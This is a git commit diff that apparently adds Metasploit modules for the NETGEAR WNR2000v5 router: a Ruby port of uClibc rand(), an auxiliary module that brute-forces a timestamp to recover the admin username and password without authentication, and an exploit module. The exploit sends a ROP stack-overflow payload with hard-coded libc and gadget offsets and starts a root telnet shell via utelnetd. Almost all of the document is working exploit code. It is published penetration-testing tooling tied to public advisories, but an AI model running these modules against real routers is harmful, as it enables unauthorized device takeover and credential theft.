Land #7778, RCE on Netgear WNR2000v5
commit
e04f01ed6b
|
@ -0,0 +1,113 @@
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# This module provides a complete port of the libc rand() and srand() functions.
|
||||||
|
# It is used by the NETGEAR WNR2000v5 auxiliary and exploit modules, but might
|
||||||
|
# be useful for any other module that needs to emulate C's random number generator.
|
||||||
|
#
|
||||||
|
# Author: Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
|
||||||
|
#
|
||||||
|
###
|
||||||
|
module Auxiliary::CRand
|
||||||
|
|
||||||
|
attr_accessor :randtbl
|
||||||
|
attr_accessor :unsafe_state
|
||||||
|
|
||||||
|
####################
|
||||||
|
# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
|
||||||
|
# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c
|
||||||
|
|
||||||
|
TYPE_3 = 3
|
||||||
|
BREAK_3 = 128
|
||||||
|
DEG_3 = 31
|
||||||
|
SEP_3 = 3
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super
|
||||||
|
|
||||||
|
@randtbl =
|
||||||
|
[
|
||||||
|
# we omit TYPE_3 from here, not needed
|
||||||
|
-1726662223, 379960547, 1735697613, 1040273694, 1313901226,
|
||||||
|
1627687941, -179304937, -2073333483, 1780058412, -1989503057,
|
||||||
|
-615974602, 344556628, 939512070, -1249116260, 1507946756,
|
||||||
|
-812545463, 154635395, 1388815473, -1926676823, 525320961,
|
||||||
|
-1009028674, 968117788, -123449607, 1284210865, 435012392,
|
||||||
|
-2017506339, -911064859, -370259173, 1132637927, 1398500161,
|
||||||
|
-205601318,
|
||||||
|
]
|
||||||
|
|
||||||
|
@unsafe_state = {
|
||||||
|
"fptr" => SEP_3,
|
||||||
|
"rptr" => 0,
|
||||||
|
"state" => 0,
|
||||||
|
"rand_type" => TYPE_3,
|
||||||
|
"rand_deg" => DEG_3,
|
||||||
|
"rand_sep" => SEP_3,
|
||||||
|
"end_ptr" => DEG_3
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
# Emulate the behaviour of C's srand
|
||||||
|
def srandom_r (seed)
|
||||||
|
state = @randtbl
|
||||||
|
if seed == 0
|
||||||
|
seed = 1
|
||||||
|
end
|
||||||
|
state[0] = seed
|
||||||
|
|
||||||
|
dst = 0
|
||||||
|
word = seed
|
||||||
|
kc = DEG_3
|
||||||
|
for i in 1..(kc-1)
|
||||||
|
hi = word / 127773
|
||||||
|
lo = word % 127773
|
||||||
|
word = 16807 * lo - 2836 * hi
|
||||||
|
if (word < 0)
|
||||||
|
word += 2147483647
|
||||||
|
end
|
||||||
|
dst += 1
|
||||||
|
state[dst] = word
|
||||||
|
end
|
||||||
|
|
||||||
|
@unsafe_state['fptr'] = @unsafe_state['rand_sep']
|
||||||
|
@unsafe_state['rptr'] = 0
|
||||||
|
|
||||||
|
kc *= 10
|
||||||
|
kc -= 1
|
||||||
|
while (kc >= 0)
|
||||||
|
random_r
|
||||||
|
kc -= 1
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Emulate the behaviour of C's rand
|
||||||
|
def random_r
|
||||||
|
buf = @unsafe_state
|
||||||
|
state = buf['state']
|
||||||
|
|
||||||
|
fptr = buf['fptr']
|
||||||
|
rptr = buf['rptr']
|
||||||
|
end_ptr = buf['end_ptr']
|
||||||
|
val = @randtbl[fptr] += @randtbl[rptr]
|
||||||
|
|
||||||
|
result = (val >> 1) & 0x7fffffff
|
||||||
|
fptr += 1
|
||||||
|
if (fptr >= end_ptr)
|
||||||
|
fptr = state
|
||||||
|
rptr += 1
|
||||||
|
else
|
||||||
|
rptr += 1
|
||||||
|
if (rptr >= end_ptr)
|
||||||
|
rptr = state
|
||||||
|
end
|
||||||
|
end
|
||||||
|
buf['fptr'] = fptr
|
||||||
|
buf['rptr'] = rptr
|
||||||
|
|
||||||
|
result
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -4,6 +4,7 @@
|
||||||
# Auxiliary mixins
|
# Auxiliary mixins
|
||||||
#
|
#
|
||||||
require 'msf/core/auxiliary/auth_brute'
|
require 'msf/core/auxiliary/auth_brute'
|
||||||
|
require 'msf/core/auxiliary/crand'
|
||||||
require 'msf/core/auxiliary/dos'
|
require 'msf/core/auxiliary/dos'
|
||||||
require 'msf/core/auxiliary/drdos'
|
require 'msf/core/auxiliary/drdos'
|
||||||
require 'msf/core/auxiliary/fuzzer'
|
require 'msf/core/auxiliary/fuzzer'
|
||||||
|
|
|
@ -0,0 +1,261 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'time'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::CRand
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'NETGEAR WNR2000v5 Administrator Password Recovery',
|
||||||
|
'Description' => %q{
|
||||||
|
The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.
|
||||||
|
This vulnerability can be exploited by an unauthenticated attacker who is able to guess
|
||||||
|
the value of a certain timestamp which is in the configuration of the router.
|
||||||
|
Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
|
||||||
|
it is guaranteed that it can be bruteforced.
|
||||||
|
This module works very reliably and it has been tested with the WNR2000v5, firmware versions
|
||||||
|
1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this
|
||||||
|
has not been tested.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2016-10175'],
|
||||||
|
['CVE', '2016-10176'],
|
||||||
|
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
|
||||||
|
['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
|
||||||
|
['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Dec 20 2016'))
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80)
|
||||||
|
], self.class)
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
|
||||||
|
OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting through', 200])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_current_time
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if res && res['Date']
|
||||||
|
date = res['Date']
|
||||||
|
return Time.parse(date).strftime('%s').to_i
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Do some crazyness to force Ruby to cast to a single-precision float and
|
||||||
|
# back to an integer.
|
||||||
|
# This emulates the behaviour of the soft-fp library and the float cast
|
||||||
|
# which is done at the end of Netgear's timestamp generator.
|
||||||
|
def ieee754_round (number)
|
||||||
|
[number].pack('f').unpack('f*')[0].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
# This is the actual algorithm used in the get_timestamp function in
|
||||||
|
# the Netgear firmware.
|
||||||
|
def get_timestamp(time)
|
||||||
|
srandom_r time
|
||||||
|
t0 = random_r
|
||||||
|
t1 = 0x17dc65df;
|
||||||
|
hi = (t0 * t1) >> 32;
|
||||||
|
t2 = t0 >> 31;
|
||||||
|
t3 = hi >> 23;
|
||||||
|
t3 = t3 - t2;
|
||||||
|
t4 = t3 * 0x55d4a80;
|
||||||
|
t0 = t0 - t4;
|
||||||
|
t0 = t0 + 0x989680;
|
||||||
|
|
||||||
|
ieee754_round(t0)
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_creds
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/BRS_netgear_success.html',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if res && res.body =~ /var sn="([\w]*)";/
|
||||||
|
serial = $1
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain serial number, bailing out...")
|
||||||
|
end
|
||||||
|
|
||||||
|
# 1: send serial number
|
||||||
|
send_request_cgi({
|
||||||
|
'uri' => '/apply_noauth.cgi?/unauth.cgi',
|
||||||
|
'method' => 'POST',
|
||||||
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
|
'vars_post' =>
|
||||||
|
{
|
||||||
|
'submit_flag' => 'match_sn',
|
||||||
|
'serial_num' => serial,
|
||||||
|
'continue' => '+Continue+'
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
# 2: send answer to secret questions
|
||||||
|
send_request_cgi({
|
||||||
|
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
|
||||||
|
'method' => 'POST',
|
||||||
|
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||||
|
'vars_post' =>
|
||||||
|
{
|
||||||
|
'submit_flag' => 'security_question',
|
||||||
|
'answer1' => @q1,
|
||||||
|
'answer2' => @q2,
|
||||||
|
'continue' => '+Continue+'
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
# 3: PROFIT!!!
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/passwordrecovered.cgi',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
if res && res.body =~ /Admin Password: (.*)<\/TD>/
|
||||||
|
password = $1
|
||||||
|
if password.blank?
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
|
||||||
|
end
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password")
|
||||||
|
end
|
||||||
|
|
||||||
|
if res && res.body =~ /Admin Username: (.*)<\/TD>/
|
||||||
|
username = $1
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Failed to obtain username")
|
||||||
|
end
|
||||||
|
|
||||||
|
return [username, password]
|
||||||
|
end
|
||||||
|
|
||||||
|
def report_cred(opts)
|
||||||
|
service_data = {
|
||||||
|
address: opts[:ip],
|
||||||
|
port: opts[:port],
|
||||||
|
service_name: 'netgear',
|
||||||
|
protocol: 'tcp',
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :service,
|
||||||
|
module_fullname: fullname,
|
||||||
|
username: opts[:user],
|
||||||
|
private_data: opts[:password],
|
||||||
|
private_type: :password
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
login_data = {
|
||||||
|
last_attempted_at: DateTime.now,
|
||||||
|
core: create_credential(credential_data),
|
||||||
|
status: Metasploit::Model::Login::Status::SUCCESSFUL,
|
||||||
|
proof: opts[:proof]
|
||||||
|
}.merge(service_data)
|
||||||
|
|
||||||
|
create_credential_login(login_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
def send_req(timestamp)
|
||||||
|
begin
|
||||||
|
uri_str = (timestamp == nil ? \
|
||||||
|
"/apply_noauth.cgi?/PWD_password.htm" : \
|
||||||
|
"/apply_noauth.cgi?/PWD_password.htm%20timestamp=#{timestamp.to_s}")
|
||||||
|
res = send_request_raw({
|
||||||
|
'uri' => uri_str,
|
||||||
|
'method' => 'POST',
|
||||||
|
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
|
||||||
|
'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"
|
||||||
|
})
|
||||||
|
return res
|
||||||
|
rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
# generate the security questions
|
||||||
|
@q1 = Rex::Text.rand_text_alpha(rand(20) + 2)
|
||||||
|
@q2 = Rex::Text.rand_text_alpha(rand(20) + 2)
|
||||||
|
|
||||||
|
# let's try without timestamp first (the timestamp only gets set if the user visited the page before)
|
||||||
|
print_status("#{peer} - Trying the easy way out first")
|
||||||
|
res = send_req(nil)
|
||||||
|
if res && res.code == 200
|
||||||
|
credentials = get_creds
|
||||||
|
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# no result? let's just go on and bruteforce the timestamp
|
||||||
|
print_bad("#{peer} - Well that didn't work... let's do it the hard way.")
|
||||||
|
|
||||||
|
# get the current date from the router and parse it
|
||||||
|
end_time = get_current_time
|
||||||
|
if end_time == nil
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
||||||
|
end
|
||||||
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
start_time = 0
|
||||||
|
else
|
||||||
|
start_time = end_time - datastore['TIME_OFFSET']
|
||||||
|
end
|
||||||
|
end_time += datastore['TIME_SURPLUS']
|
||||||
|
|
||||||
|
if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||||
|
end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
|
||||||
|
print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")
|
||||||
|
|
||||||
|
# work back from the current router time minus datastore['TIME_OFFSET']
|
||||||
|
while true
|
||||||
|
for time in end_time.downto(start_time)
|
||||||
|
timestamp = get_timestamp(time)
|
||||||
|
sleep 0.1
|
||||||
|
if time % 400 == 0
|
||||||
|
print_status("#{peer} - Still working, trying time #{time}")
|
||||||
|
end
|
||||||
|
res = send_req(timestamp)
|
||||||
|
if res && res.code == 200
|
||||||
|
credentials = get_creds
|
||||||
|
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
|
||||||
|
report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end_time = start_time
|
||||||
|
start_time -= datastore['TIME_OFFSET']
|
||||||
|
if start_time < 0
|
||||||
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
|
||||||
|
end
|
||||||
|
start_time = 0
|
||||||
|
end
|
||||||
|
print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")
|
||||||
|
|
||||||
|
# let the router clear the buffers a bit...
|
||||||
|
sleep 30
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,270 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'time'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::CRand
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi
|
||||||
|
parameter.
|
||||||
|
In order to exploit it, it is necessary to guess the value of a certain timestamp which
|
||||||
|
is in the configuration of the router. An authenticated attacker can simply fetch this
|
||||||
|
from a page, but an unauthenticated attacker has to brute force it.
|
||||||
|
Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
|
||||||
|
it is guaranteed that it can be bruteforced.
|
||||||
|
This module implements both modes, and it works very reliably. It has been tested with
|
||||||
|
the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware
|
||||||
|
revisions v4 and v3, but this has not been tested - with these routers it might be necessary
|
||||||
|
to adjust the LibcBase variable as well as the gadget addresses.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => ['unix'],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2016-10174'],
|
||||||
|
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
|
||||||
|
['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
|
||||||
|
['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
|
||||||
|
],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'NETGEAR WNR2000v5',
|
||||||
|
{
|
||||||
|
'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
|
||||||
|
'SystemOffset' => 0x547D0,
|
||||||
|
'GadgetOffset' => 0x2462C,
|
||||||
|
#The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()):
|
||||||
|
#LOAD:0002462C addiu $a0, $sp, 0x40+arg_0
|
||||||
|
#LOAD:00024630 move $t9, $s0
|
||||||
|
#LOAD:00024634 jalr $t9
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00\x25\x26",
|
||||||
|
'Compat' => {
|
||||||
|
'PayloadType' => 'cmd_interact',
|
||||||
|
'ConnectionType' => 'find',
|
||||||
|
},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
],
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
|
||||||
|
'DisclosureDate' => 'Dec 20 2016',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80),
|
||||||
|
OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
|
||||||
|
OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
|
||||||
|
], self.class)
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
|
||||||
|
OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if res && res.headers['WWW-Authenticate']
|
||||||
|
auth = res.headers['WWW-Authenticate']
|
||||||
|
if auth =~ /WNR2000v5/
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
end
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def uri_encode (str)
|
||||||
|
"%" + str.scan(/.{2}|.+/).join("%")
|
||||||
|
end
|
||||||
|
|
||||||
|
def calc_address (libc_base, offset)
|
||||||
|
addr = (libc_base + offset).to_s(16)
|
||||||
|
uri_encode(addr)
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_current_time
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if res && res['Date']
|
||||||
|
date = res['Date']
|
||||||
|
return Time.parse(date).strftime('%s').to_i
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_auth_timestamp
|
||||||
|
res = send_request_raw({
|
||||||
|
'uri' => '/lang_check.html',
|
||||||
|
'method' => 'GET',
|
||||||
|
# automatically uses HttpPassword and HttpUsername to authenticate
|
||||||
|
})
|
||||||
|
if res && res.code == 401
|
||||||
|
# try again, might fail the first time
|
||||||
|
res = send_request_raw({
|
||||||
|
'uri' => '/lang_check.html',
|
||||||
|
'method' => 'GET',
|
||||||
|
# automatically uses HttpPassword and HttpUsername to authenticate
|
||||||
|
})
|
||||||
|
end
|
||||||
|
if res && res.code == 200
|
||||||
|
if res.body =~ /timestamp=([0-9]{8})/
|
||||||
|
$1.to_i
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Do some crazyness to force Ruby to cast to a single-precision float and
|
||||||
|
# back to an integer.
|
||||||
|
# This emulates the behaviour of the soft-fp library and the float cast
|
||||||
|
# which is done at the end of Netgear's timestamp generator.
|
||||||
|
def ieee754_round (number)
|
||||||
|
[number].pack('f').unpack('f*')[0].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
# This is the actual algorithm used in the get_timestamp function in
|
||||||
|
# the Netgear firmware.
|
||||||
|
def get_timestamp(time)
|
||||||
|
srandom_r time
|
||||||
|
t0 = random_r
|
||||||
|
t1 = 0x17dc65df;
|
||||||
|
hi = (t0 * t1) >> 32;
|
||||||
|
t2 = t0 >> 31;
|
||||||
|
t3 = hi >> 23;
|
||||||
|
t3 = t3 - t2;
|
||||||
|
t4 = t3 * 0x55d4a80;
|
||||||
|
t0 = t0 - t4;
|
||||||
|
t0 = t0 + 0x989680;
|
||||||
|
|
||||||
|
ieee754_round(t0)
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_payload
|
||||||
|
rand_text_alpha(36) + # filler_1
|
||||||
|
calc_address(target['LibcBase'], target['SystemOffset']) + # s0
|
||||||
|
rand_text_alpha(12) + # s1, s2 and s3
|
||||||
|
calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget
|
||||||
|
rand_text_alpha(0x40) + # filler_2
|
||||||
|
"killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
|
||||||
|
end
|
||||||
|
|
||||||
|
def send_req(timestamp)
|
||||||
|
begin
|
||||||
|
uri_str = (timestamp == nil ? \
|
||||||
|
"/apply_noauth.cgi?/lang_check.html" : \
|
||||||
|
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
|
||||||
|
res = send_request_raw({
|
||||||
|
'uri' => uri_str,
|
||||||
|
'method' => 'POST',
|
||||||
|
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
|
||||||
|
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
|
||||||
|
})
|
||||||
|
rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
# 1: try to see if the default admin username and password are set
|
||||||
|
timestamp = get_auth_timestamp
|
||||||
|
|
||||||
|
# 2: now we try two things at once:
|
||||||
|
# one, if the timestamp is not nil then we got an authenticated timestamp, let's try that
|
||||||
|
# two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before)
|
||||||
|
print_status("#{peer} - Trying the easy way out first")
|
||||||
|
send_req(timestamp)
|
||||||
|
begin
|
||||||
|
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||||
|
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
|
||||||
|
if not sock.nil?
|
||||||
|
print_good("#{peer} - Success, shell incoming!")
|
||||||
|
return handler(sock)
|
||||||
|
end
|
||||||
|
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
sock.close if sock
|
||||||
|
end
|
||||||
|
|
||||||
|
print_bad("#{peer} - Well that didn't work... let's do it the hard way.")
|
||||||
|
|
||||||
|
# no shell? let's just go on and bruteforce the timestamp
|
||||||
|
# 3: get the current date from the router and parse it
|
||||||
|
end_time = get_current_time
|
||||||
|
if end_time.nil?
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
|
||||||
|
end
|
||||||
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
start_time = 0
|
||||||
|
else
|
||||||
|
start_time = end_time - datastore['TIME_OFFSET']
|
||||||
|
end
|
||||||
|
end_time += datastore['TIME_SURPLUS']
|
||||||
|
|
||||||
|
if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||||
|
end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
|
||||||
|
print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")
|
||||||
|
|
||||||
|
# 2: work back from the current router time minus datastore['TIME_OFFSET']
|
||||||
|
while true
|
||||||
|
for time in end_time.downto(start_time)
|
||||||
|
timestamp = get_timestamp(time)
|
||||||
|
sleep 0.1
|
||||||
|
if time % 400 == 0
|
||||||
|
print_status("#{peer} - Still working, trying time #{time}")
|
||||||
|
end
|
||||||
|
send_req(timestamp)
|
||||||
|
begin
|
||||||
|
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||||
|
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
|
||||||
|
if sock.nil?
|
||||||
|
next
|
||||||
|
end
|
||||||
|
print_status("#{peer} - Success, shell incoming!")
|
||||||
|
return handler(sock)
|
||||||
|
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||||
|
sock.close if sock
|
||||||
|
next
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end_time = start_time
|
||||||
|
start_time -= datastore['TIME_OFFSET']
|
||||||
|
if start_time < 0
|
||||||
|
if end_time <= datastore['TIME_OFFSET']
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
|
||||||
|
end
|
||||||
|
start_time = 0
|
||||||
|
end
|
||||||
|
print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")
|
||||||
|
|
||||||
|
# let the router clear the buffers a bit...
|
||||||
|
sleep 30
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue